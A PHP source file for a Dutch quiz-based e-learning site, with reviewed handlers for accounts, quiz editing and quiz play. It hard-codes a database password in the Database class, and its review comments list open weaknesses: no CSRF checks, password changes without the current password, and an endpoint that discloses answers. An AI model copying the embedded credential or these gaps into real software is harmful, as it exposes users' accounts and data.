<?php
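/**
 * Lazily created, process-wide PDO connection to the MySQL database.
 *
 * SECURITY (review): the connection credentials are hard-coded in this source
 * file. Anyone who can read the file (a misconfigured web server, a backup, a
 * repository, a file listing) obtains working database credentials. Load them
 * from configuration kept outside the web root and rotate the password below
 * if this file has ever been readable by someone who should not have it.
 */
class Database
{
    private static $host = 'localhost';
    private static $dbName = 'elearning';
    private static $username = 'elearning';
    private static $password = 'Yaido123!';

    // Shared connection; stays null until conn() has succeeded once.
    // Kept public for existing callers, but read it through conn() so the
    // connection is guaranteed to exist.
    public static $conn = null;

    /**
     * Returns the shared PDO connection, opening it on first use.
     *
     * The connection is switched to exception error mode, so failed queries
     * throw PDOException instead of returning false.
     *
     * On a connection failure the script is terminated. The driver message is
     * written to the server error log only: it can contain the host and the
     * database user name and must not be sent to the browser.
     *
     * @return PDO
     */
    public static function conn()
    {
        if (self::$conn === null) {
            try {
                self::$conn = new PDO(
                    "mysql:host=" . self::$host . ";dbname=" . self::$dbName,
                    self::$username,
                    self::$password
                );
                self::$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            } catch (PDOException $e) {
                self::$conn = null;
                error_log('Database connection failed: ' . $e->getMessage());
                if (!headers_sent()) {
                    http_response_code(500);
                }
                die("Fout bij verbinden.");
            }
        }

        return self::$conn;
    }
}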
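/**
 * Request handlers for registration, login and account changes.
 *
 * Every method reads the PHP superglobals directly and writes to the response
 * (echo / Location header). A redirect only takes effect when the method runs
 * before the page has sent output.
 *
 * NOTE(review): none of the state-changing POST handlers in this class checks
 * a CSRF token, and changePassword() does not ask for the current password.
 * Both need form fields that are not visible in this file.
 */
class Account
{
    /**
     * Returns $_POST[$key] when it is a string; null when it is missing or
     * was submitted as an array (e.g. "username[]=x").
     */
    private static function postString($key)
    {
        return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : null;
    }

    /** Starts the session when none is active and headers can still be sent. */
    private static function ensureSession()
    {
        if (session_status() === PHP_SESSION_NONE && !headers_sent()) {
            session_start();
        }
    }

    /**
     * Redirects and stops the script; when output has already started (so a
     * Location header can no longer be sent) prints $fallback instead.
     */
    private static function redirectOrEcho($location, $fallback)
    {
        if (!headers_sent()) {
            header('Location: ' . $location);
            exit;
        }
        echo $fallback;
    }

    /**
     * Handles the registration form (POST fields: username, password,
     * checked_pass). Does nothing for other request methods.
     *
     * All three values are trimmed, as before; userLogin() trims the same way,
     * so the stored hash always matches what login compares against.
     * Database errors are logged, never echoed: the driver message can reveal
     * table and column names or whether a user name is already taken.
     */
    public static function userRegister()
    {
        if ($_SERVER["REQUEST_METHOD"] !== "POST") {
            return;
        }

        $username = self::postString('username');
        $password = self::postString('password');
        $checkedpass = self::postString('checked_pass');
        if ($username === null || $password === null || $checkedpass === null) {
            echo "<script> alert('Er is iets misgegaan, probeer het opnieuw.');</script>";
            return;
        }

        $username = trim($username);
        $password = trim($password);
        $checkedpass = trim($checkedpass);

        if ($password !== $checkedpass) {
            echo "<script> alert('Wachtwoorden zijn niet hetzelfde');</script>";
            return;
        }
        // An empty user name or password would otherwise create an account
        // that anyone can log in to.
        if ($username === '' || $password === '') {
            echo "<script> alert('Er is iets misgegaan, probeer het opnieuw.');</script>";
            return;
        }

        $hashed_password = password_hash($password, PASSWORD_DEFAULT);

        try {
            $sql = "INSERT INTO users (username, password) VALUES (:username, :password)";
            $stmt = Database::conn()->prepare($sql);
            $stmt->bindParam(':username', $username);
            $stmt->bindParam(':password', $hashed_password);
            $created = $stmt->execute();
        } catch (PDOException $e) {
            error_log('Account::userRegister failed: ' . $e->getMessage());
            $created = false;
        }

        if (!$created) {
            echo "<script> alert('Er is iets misgegaan, probeer het opnieuw.');</script>";
            return;
        }

        // The original echoed the alert and then called header(), which fails
        // once output has started. Redirect when possible, alert otherwise.
        self::redirectOrEcho('login.php', "<script> alert('Succesvol geregistreerd!');</script>");
    }

    /**
     * Handles the login form (POST fields: username, password).
     *
     * On success the session id is regenerated (so an id planted before login
     * cannot be reused afterwards), user_id and username are stored in the
     * session, and the request is redirected to account.php.
     *
     * @return string|null The error message to show on a failed attempt;
     *                     null when the request is not a POST.
     */
    public static function userLogin()
    {
        if ($_SERVER["REQUEST_METHOD"] !== "POST") {
            return null;
        }

        $error = "Ongeldige gebruikersnaam of wachtwoord.";

        $username = self::postString('username');
        $password = self::postString('password');
        if ($username === null || $password === null) {
            return $error;
        }

        try {
            // Database::conn() rather than Database::$conn: the property is
            // null until conn() has been called at least once.
            $stmt = Database::conn()->prepare("SELECT * FROM users WHERE username = :username");
            $stmt->execute(['username' => trim($username)]);
            $user = $stmt->fetch();
        } catch (PDOException $e) {
            error_log('Account::userLogin failed: ' . $e->getMessage());
            return $error;
        }

        if ($user && password_verify(trim($password), $user['password'])) {
            self::ensureSession();
            if (session_status() === PHP_SESSION_ACTIVE) {
                session_regenerate_id(true);
            }
            $_SESSION['user_id'] = $user['user_id'];
            $_SESSION['username'] = $user['username'];
            header('Location: account.php');
            exit;
        }

        return $error;
    }

    /**
     * Redirects to login.php and stops the script unless a user is logged in.
     */
    public static function loginCheck()
    {
        // Without an active session $_SESSION is never populated and every
        // visitor would be treated as logged out.
        self::ensureSession();

        if (!isset($_SESSION['username'])) {
            header('Location: login.php');
            exit();
        }
    }

    /**
     * Handles the "change user name" form (POST field: new_name) for the
     * logged-in user and redirects back to account.php.
     *
     * NOTE(review): the name is HTML-escaped before it is stored, as before.
     * userRegister() stores names unescaped and userLogin() looks them up
     * unescaped, so a new name containing & < > or " can no longer be used to
     * log in. Escaping belongs where the name is printed; confirm how the
     * templates print it before changing this.
     */
    public static function changeName()
    {
        if ($_SERVER['REQUEST_METHOD'] !== "POST") {
            return;
        }

        self::ensureSession();
        if (!isset($_SESSION['user_id'])) {
            header('Location: login.php');
            exit();
        }

        $submitted = self::postString('new_name');
        // Trimmed because userLogin() trims the name it looks up.
        $newName = ($submitted === null) ? '' : htmlspecialchars(trim($submitted));

        if ($newName !== '') {
            try {
                $sql = "UPDATE users SET username = :username WHERE user_id = :user_id";
                $stmt = Database::conn()->prepare($sql);
                $stmt->execute(['username' => $newName, 'user_id' => $_SESSION['user_id']]);
                $_SESSION['username'] = $newName;
            } catch (PDOException $e) {
                error_log('Account::changeName failed: ' . $e->getMessage());
            }
        }

        header("Location: account.php");
        exit();
    }

    /**
     * Handles the "change password" form (POST field: new_password) for the
     * logged-in user.
     *
     * The new password is trimmed because userRegister() and userLogin() trim
     * theirs; an untrimmed hash could never be matched at login. The UPDATE is
     * a prepared statement instead of a string-built query.
     */
    public static function changePassword()
    {
        if ($_SERVER['REQUEST_METHOD'] !== "POST") {
            return;
        }

        self::ensureSession();
        if (!isset($_SESSION['user_id'])) {
            header('Location: login.php');
            exit();
        }

        $submitted = self::postString('new_password');
        $newPassword = ($submitted === null) ? '' : trim($submitted);
        if ($newPassword === '') {
            echo "Er is iets fout gegaan!";
            return;
        }

        $hashedPassword = password_hash($newPassword, PASSWORD_DEFAULT);

        try {
            $sql = "UPDATE users SET password = :password WHERE user_id = :user_id";
            $stmt = Database::conn()->prepare($sql);
            $result = $stmt->execute(['password' => $hashedPassword, 'user_id' => $_SESSION['user_id']]);
        } catch (PDOException $e) {
            error_log('Account::changePassword failed: ' . $e->getMessage());
            $result = false;
        }

        if (!$result) {
            echo "Er is iets fout gegaan!";
            return;
        }

        // New session id after a credential change.
        if (session_status() === PHP_SESSION_ACTIVE && !headers_sent()) {
            session_regenerate_id(true);
        }
        self::redirectOrEcho('account.php', "Wachtwoord is veranderd!");
    }
}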
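/**
 * Request handlers and render helpers for creating, editing, listing and
 * playing quizzes.
 *
 * Methods read the PHP superglobals directly and echo HTML or JSON. Database
 * errors are written to the server error log; the browser only receives a
 * generic message, because driver messages can reveal table and column names.
 */
class Quiz
{
    /** HTML-escapes a value for element content and for quoted attributes. */
    private static function esc($value)
    {
        // ENT_QUOTES: the markup below uses single-quoted attributes.
        return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }

    /** Returns $_POST[$key] when it is a string, otherwise null. */
    private static function postString($key)
    {
        return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : null;
    }

    /** Returns $_POST[$key] when it is an array, otherwise an empty array. */
    private static function postArray($key)
    {
        return (isset($_POST[$key]) && is_array($_POST[$key])) ? $_POST[$key] : [];
    }

    /**
     * Returns the logged-in user's id from the session, or null when nobody
     * is logged in. Starts the session first when that is still possible.
     */
    private static function currentUserId()
    {
        if (session_status() === PHP_SESSION_NONE && !headers_sent()) {
            session_start();
        }

        return isset($_SESSION['user_id']) ? $_SESSION['user_id'] : null;
    }

    /**
     * True when every entry of $questions is a string and each list in
     * $columns holds a string under the same key.
     */
    private static function rowsAreComplete(array $questions, array $columns)
    {
        foreach ($questions as $index => $question) {
            if (!is_string($question)) {
                return false;
            }
            foreach ($columns as $column) {
                if (!isset($column[$index]) || !is_string($column[$index])) {
                    return false;
                }
            }
        }

        return true;
    }

    /**
     * Loads name, difficulty and visibility of a quiz, but only when it
     * belongs to $user_id. Returns the row, or false when there is none.
     *
     * @throws PDOException
     */
    private static function fetchOwnedQuiz($quiz_id, $user_id)
    {
        $sql = "SELECT name, difficulty, public FROM quizzes WHERE quiz_id = :quiz_id AND user_id = :user_id";
        $stmt = Database::conn()->prepare($sql);
        $stmt->execute([':quiz_id' => $quiz_id, ':user_id' => $user_id]);

        return $stmt->fetch(PDO::FETCH_ASSOC);
    }

    /**
     * Handles the "create quiz" form (POST fields: quizName, difficulty,
     * public, questions[], answers[]) for the logged-in user.
     *
     * The quiz and its questions are written in one transaction, so a failure
     * part-way through does not leave a quiz with only some of its questions.
     */
    public static function addQuiz()
    {
        if ($_SERVER['REQUEST_METHOD'] !== "POST") {
            return;
        }

        $user_id = self::currentUserId();
        if ($user_id === null) {
            // Not logged in: do not create a quiz without an owner.
            echo "<script>alert('Er is iets misgegaan, probeer het opnieuw.');</script>";
            return;
        }

        $answers = self::postArray('answers');
        $questions = self::postArray('questions');

        if (empty($answers) || empty($questions)) {
            echo "De antwoorden en/of vragen mogen niet leeg zijn.";
            return;
        }
        if (count($answers) !== count($questions) || !self::rowsAreComplete($questions, [$answers])) {
            echo "Het aantal antwoorden komt niet overeen met het aantal vragen.";
            return;
        }

        $db = Database::conn();
        try {
            $db->beginTransaction();

            $sql = "INSERT INTO quizzes (name, difficulty, user_id, public) VALUES (:name, :difficulty, :user_id, :public)";
            $stmt = $db->prepare($sql);
            $saved = $stmt->execute([
                ':name' => self::postString('quizName'),
                ':difficulty' => self::postString('difficulty'),
                ':user_id' => $user_id,
                ':public' => self::postString('public'),
            ]);
            if (!$saved) {
                $db->rollBack();
                echo "<script>alert('Er is iets misgegaan, probeer het opnieuw.');</script>";
                return;
            }

            $quiz_id = $db->lastInsertId();
            $questionSql = "INSERT INTO questions (quiz_id, question, correct_answer) VALUES (:quiz_id, :question, :correct_answer)";
            $questionStmt = $db->prepare($questionSql);

            foreach ($questions as $index => $question) {
                $stored = $questionStmt->execute([
                    ':quiz_id' => $quiz_id,
                    ':question' => $question,
                    ':correct_answer' => $answers[$index],
                ]);
                if (!$stored) {
                    $db->rollBack();
                    echo "<script>alert('Er is iets misgegaan bij het toevoegen van de vragen.');</script>";
                    return;
                }
            }

            $db->commit();
            echo "<script>alert('Je quiz is succesvol toegevoegd!');</script>";
        } catch (PDOException $e) {
            if ($db->inTransaction()) {
                $db->rollBack();
            }
            error_log('Quiz::addQuiz failed: ' . $e->getMessage());
            echo "Fout bij het verbinden met de database.";
        }
    }

    /**
     * Echoes one card with an "Edit Quiz" link per quiz owned by the
     * logged-in user, or a placeholder when there are none.
     *
     * @return string Always an empty string; the markup is echoed.
     */
    public static function showOwnedQuizzes()
    {
        try {
            $sql = "SELECT quiz_id, user_id, name, difficulty FROM quizzes WHERE user_id = :id";
            $stmt = Database::conn()->prepare($sql);
            $stmt->bindValue(':id', self::currentUserId());
            $stmt->execute();
            $quizzes = $stmt->fetchAll(PDO::FETCH_ASSOC);

            if (empty($quizzes)) {
                echo "
<div>Je hebt nog geen quizzes</div>
";
                return "";
            }

            foreach ($quizzes as $quiz) {
                echo "
<div class='quiz-card'>
<div class='quiz-title'>" . self::esc($quiz['name']) . "</div>
<a href='editQuiz.php?id=" . self::esc($quiz['quiz_id']) . "' class='start-btn'>Edit Quiz</a>
</div>";
            }
        } catch (PDOException $e) {
            error_log('Quiz::showOwnedQuizzes failed: ' . $e->getMessage());
            echo "Fout bij het verbinden met de database.";
        }

        return "";
    }

    /**
     * Echoes one card with a "Play Quiz" link for every quiz that is public
     * or owned by the logged-in user, or a placeholder when there are none.
     */
    public static function showAllQuizzes()
    {
        try {
            $sql = "
SELECT quiz_id, user_id, name, difficulty
FROM quizzes
WHERE public = 'public' OR user_id = :user_id";
            $stmt = Database::conn()->prepare($sql);
            $stmt->bindValue(':user_id', self::currentUserId());
            $stmt->execute();
            $quizzes = $stmt->fetchAll(PDO::FETCH_ASSOC);

            if (empty($quizzes)) {
                echo "
<div>Er zijn geen quizzes</div>
<a href='createQuiz.php' class='start-btn'>Maak hier je eigen quiz aan</a>
";
                return;
            }

            foreach ($quizzes as $quiz) {
                echo "
<div class='quiz-card'>
<div class='quiz-title'>" . self::esc($quiz['name']) . "</div>
<a href='playQuiz.php?id=" . self::esc($quiz['quiz_id']) . "' class='start-btn'>Play Quiz</a>
</div>";
            }
        } catch (PDOException $e) {
            error_log('Quiz::showAllQuizzes failed: ' . $e->getMessage());
            echo "Fout bij het verbinden met de database.";
        }
    }

    /**
     * Edit page handler for the quiz named by $_GET['id'].
     *
     * On POST (fields: quizName, difficulty, public, questions[],
     * question_ids[], answers[]) the quiz and its questions are updated; a
     * question whose id is "new" is inserted. Afterwards, and on any other
     * request method, the current quiz data is loaded.
     *
     * Access control: the quiz must belong to the logged-in user, and a
     * question is only updated when it belongs to this quiz. Without these
     * conditions any visitor could overwrite any quiz or question by
     * submitting its id. Quizzes of other users are reported as not found.
     *
     * The script is terminated with a message when the id is missing, the
     * quiz is not found, it has no questions, or a database error occurs.
     *
     * @return array ['quiz' => row, 'questions' => rows, 'quiz_id' => id]
     */
    public static function editQuiz()
    {
        if (!isset($_GET['id']) || !is_string($_GET['id'])) {
            echo "Geen quiz geselecteerd.";
            exit;
        }
        $quiz_id = $_GET['id'];
        $user_id = self::currentUserId();

        try {
            $owned = ($user_id === null) ? false : self::fetchOwnedQuiz($quiz_id, $user_id);
        } catch (PDOException $e) {
            error_log('Quiz::editQuiz ownership lookup failed: ' . $e->getMessage());
            echo "Fout bij het ophalen van quizgegevens.";
            exit;
        }
        if (!$owned) {
            echo "Quiz niet gevonden.";
            exit;
        }

        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            $questions_in = self::postArray('questions');
            $ids_in = self::postArray('question_ids');
            $answers_in = self::postArray('answers');

            if (!self::rowsAreComplete($questions_in, [$ids_in, $answers_in])) {
                // Malformed submission: change nothing and show the form again.
                echo "Het aantal antwoorden komt niet overeen met het aantal vragen.";
            } else {
                $db = Database::conn();
                try {
                    $db->beginTransaction();

                    // Update quiz details
                    $update_quiz_sql = "UPDATE quizzes SET name = :name, difficulty = :difficulty, public = :public WHERE quiz_id = :quiz_id AND user_id = :user_id";
                    $update_quiz_stmt = $db->prepare($update_quiz_sql);
                    $update_quiz_stmt->execute([
                        ':name' => self::postString('quizName'),
                        ':difficulty' => self::postString('difficulty'),
                        ':public' => self::postString('public'),
                        ':quiz_id' => $quiz_id,
                        ':user_id' => $user_id,
                    ]);

                    $insert_question_sql = "INSERT INTO questions (quiz_id, question, correct_answer) VALUES (:quiz_id, :question, :correct_answer)";
                    $insert_question_stmt = $db->prepare($insert_question_sql);
                    // quiz_id in the WHERE clause keeps a submitted question id
                    // from reaching a question of another quiz.
                    $update_question_sql = "UPDATE questions SET question = :question, correct_answer = :correct_answer WHERE question_id = :question_id AND quiz_id = :quiz_id";
                    $update_question_stmt = $db->prepare($update_question_sql);

                    // Update each question, or insert it when it is new
                    foreach ($questions_in as $index => $question) {
                        if ($ids_in[$index] === "new") {
                            $insert_question_stmt->execute([
                                ':quiz_id' => $quiz_id,
                                ':question' => $question,
                                ':correct_answer' => $answers_in[$index],
                            ]);
                        } else {
                            $update_question_stmt->execute([
                                ':question' => $question,
                                ':correct_answer' => $answers_in[$index],
                                ':question_id' => $ids_in[$index],
                                ':quiz_id' => $quiz_id,
                            ]);
                        }
                    }

                    $db->commit();
                    echo "<script>alert('Quiz succesvol bijgewerkt!');</script>";
                } catch (PDOException $e) {
                    if ($db->inTransaction()) {
                        $db->rollBack();
                    }
                    error_log('Quiz::editQuiz update failed: ' . $e->getMessage());
                    echo "Fout bij het bijwerken van de quiz.";
                    exit;
                }
            }
        }

        try {
            $quiz = self::fetchOwnedQuiz($quiz_id, $user_id);
            if (!$quiz) {
                echo "Quiz niet gevonden.";
                exit;
            }

            $questions_sql = "SELECT question_id, question, correct_answer FROM questions WHERE quiz_id = :quiz_id";
            $stmt = Database::conn()->prepare($questions_sql);
            $stmt->execute([':quiz_id' => $quiz_id]);
            $questions = $stmt->fetchAll(PDO::FETCH_ASSOC);
            if (empty($questions)) {
                echo "Geen vragen gevonden voor deze quiz.";
                exit;
            }

            return ['quiz' => $quiz, 'questions' => $questions, 'quiz_id' => $quiz_id];
        } catch (PDOException $e) {
            error_log('Quiz::editQuiz load failed: ' . $e->getMessage());
            echo "Fout bij het ophalen van quizgegevens.";
            exit;
        }
    }

    /**
     * Terminates the script with a message unless the request names a quiz
     * through a single-valued "id" query parameter.
     */
    public static function quizCheck()
    {
        if (!isset($_GET['id']) || !is_string($_GET['id'])) {
            echo "Geen quiz geselecteerd.";
            exit;
        }
    }

    /**
     * Loads a quiz and its questions, including the correct answers.
     *
     * NOTE(review): unlike showAllQuizzes(), this lookup does not test the
     * quiz's "public" value or its owner, so any quiz can be loaded by id.
     * Confirm whether non-public quizzes are meant to be reachable by link.
     *
     * @param mixed $quiz_id Quiz id, bound as an integer.
     * @return array|false ['quiz' => row or false, 'questions' => rows], or
     *                     false when the database reports an error.
     */
    public static function getQuizById($quiz_id)
    {
        try {
            $sqlQuiz = "SELECT name, difficulty FROM quizzes WHERE quiz_id = :quiz_id";
            $sqlQuestions = "SELECT question_id, question, correct_answer FROM questions WHERE quiz_id = :quiz_id";

            // Fetch the quiz row
            $stmtQuiz = Database::conn()->prepare($sqlQuiz);
            $stmtQuiz->bindParam(':quiz_id', $quiz_id, PDO::PARAM_INT);
            $stmtQuiz->execute();
            $quiz = $stmtQuiz->fetch(PDO::FETCH_ASSOC);

            // Fetch its questions
            $stmtQuestions = Database::conn()->prepare($sqlQuestions);
            $stmtQuestions->bindParam(':quiz_id', $quiz_id, PDO::PARAM_INT);
            $stmtQuestions->execute();
            $questions = $stmtQuestions->fetchAll(PDO::FETCH_ASSOC);

            return ['quiz' => $quiz, 'questions' => $questions];
        } catch (PDOException $e) {
            error_log('Quiz::getQuizById failed: ' . $e->getMessage());
            echo "Fout bij het ophalen van quizgegevens.";
            return false;
        }
    }

    /**
     * Plays a quiz one question per request, keeping progress in the session
     * keys "current_question" and "score".
     *
     * A posted answer is graded only when its question_id is the id of the
     * question the session is currently on. A repeated or stale submission
     * (page reload, back button) is ignored instead of being graded against
     * whichever question happens to be current.
     *
     * NOTE(review): progress is not keyed by quiz, so opening a second quiz
     * while one is in progress continues from the first quiz's position.
     *
     * @param array|false|null $quiz      Quiz row with "name" and "difficulty".
     * @param array            $questions Rows with "question_id", "question"
     *                                    and "correct_answer".
     */
    public static function showQuiz($quiz, $questions)
    {
        if (!$quiz) {
            echo "<p>Deze quiz bestaat niet.</p>";
            return;
        }
        if (!is_array($questions)) {
            $questions = [];
        }

        // Start the session when it has not been started yet
        if (session_status() === PHP_SESSION_NONE) {
            session_start();
        }

        // First visit: begin at the first question with a score of zero
        if (!isset($_SESSION['current_question'], $_SESSION['score'])) {
            $_SESSION['current_question'] = 0;
            $_SESSION['score'] = 0;
        }

        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['answer'], $_POST['question_id'])) {
            $currentIndex = $_SESSION['current_question'];
            $answersCurrentQuestion = isset($questions[$currentIndex])
                && is_string($_POST['answer'])
                && is_scalar($_POST['question_id'])
                && (string) $_POST['question_id'] === (string) $questions[$currentIndex]['question_id'];

            if ($answersCurrentQuestion) {
                $userAnswer = trim($_POST['answer']);
                if (strcasecmp($userAnswer, $questions[$currentIndex]['correct_answer']) === 0) {
                    $_SESSION['score']++;
                }
                // Move on to the next question
                $_SESSION['current_question']++;
            }
        }

        $currentIndex = $_SESSION['current_question'];

        if ($currentIndex < count($questions)) {
            $currentQuestion = $questions[$currentIndex];
            $questionId = self::esc($currentQuestion['question_id']);

            echo "<div class='container'>";
            echo "<h2>" . self::esc($quiz['name']) . "</h2>";
            echo "<p>Difficulty: " . self::esc($quiz['difficulty']) . "</p>";
            echo "<div class='vraag'>";
            echo "<label>" . self::esc($currentQuestion['question']) . "</label>";
            echo "<form method='post' class='quiz-form' action=''>";
            echo "<input type='text' class='answer-input' name='answer' data-question-id='" . $questionId . "' placeholder='Uw antwoord' required>";
            echo "<input type='hidden' name='question_id' value='" . $questionId . "'>";
            echo "<button type='submit'>Antwoord versturen</button>";
            echo "</form>";
            echo "</div>";
            echo "<span id='result-" . $questionId . "' class='feedback'></span>";
            echo "</div>";
            return;
        }

        // Past the last question: show the result and reset the progress
        echo "<div class='result-overview'>";
        echo "<h3>Quiz Overzicht</h3>";
        echo "<p>Je hebt " . (int) $_SESSION['score'] . " van de " . count($questions) . " vragen goed!</p>";
        echo "<a href='startQuiz.php'>Speel nog een quiz</a>";
        echo "</div>";

        unset($_SESSION['current_question']);
        unset($_SESSION['score']);
    }

    /**
     * Loads a quiz through getQuizById() and swaps "question" and
     * "correct_answer" in every question row, so the quiz can be played in
     * the reverse direction.
     *
     * @param mixed $quiz_id
     * @return array|false Same shape as getQuizById(); false when loading failed.
     */
    public static function switchQuestionsAndAnswers($quiz_id)
    {
        $data = self::getQuizById($quiz_id);
        if ($data === false) {
            // getQuizById() has already reported the error.
            return false;
        }

        foreach ($data['questions'] as $index => $row) {
            $data['questions'][$index]['question'] = $row['correct_answer'];
            $data['questions'][$index]['correct_answer'] = $row['question'];
        }

        return $data;
    }

    /**
     * JSON endpoint: compares a posted answer (POST fields: question_id,
     * answer) with the stored answer, ignoring case and surrounding spaces.
     *
     * The response is sent as application/json with < > & ' " hex-escaped.
     * The stored answer is text written by the quiz author; without both
     * measures a browser that opens the response directly could treat that
     * text as HTML.
     *
     * NOTE(review): the response contains correct_answer for any question id
     * and the endpoint checks no login, so the answers can be read without
     * playing the quiz. Confirm that this is intended.
     */
    public static function checkAnswer()
    {
        if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
            return;
        }

        $question_id = (isset($_POST['question_id']) && is_scalar($_POST['question_id']))
            ? (string) $_POST['question_id']
            : null;
        $posted_answer = self::postString('answer');
        $user_answer = ($posted_answer === null) ? null : trim($posted_answer);

        // Compared with '' rather than tested for truthiness: "0" is a valid answer.
        if ($question_id === null || $question_id === '' || $user_answer === null || $user_answer === '') {
            $response = ['status' => 'error', 'message' => 'Onvolledige invoerdata.'];
        } else {
            try {
                $sql = "SELECT correct_answer FROM questions WHERE question_id = :question_id";
                $stmt = Database::conn()->prepare($sql);
                $stmt->bindParam(':question_id', $question_id, PDO::PARAM_INT);
                $stmt->execute();
                $result = $stmt->fetch(PDO::FETCH_ASSOC);

                if ($result) {
                    $correct_answer = trim($result['correct_answer']);
                    $response = [
                        'status' => 'success',
                        'is_correct' => strcasecmp($user_answer, $correct_answer) === 0,
                        'correct_answer' => $correct_answer
                    ];
                } else {
                    $response = ['status' => 'error', 'message' => 'Vraag niet gevonden.'];
                }
            } catch (PDOException $e) {
                error_log('Quiz::checkAnswer failed: ' . $e->getMessage());
                $response = ['status' => 'error', 'message' => 'Databasefout.'];
            }
        }

        if (!headers_sent()) {
            header('Content-Type: application/json; charset=utf-8');
        }
        echo json_encode($response, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    }
}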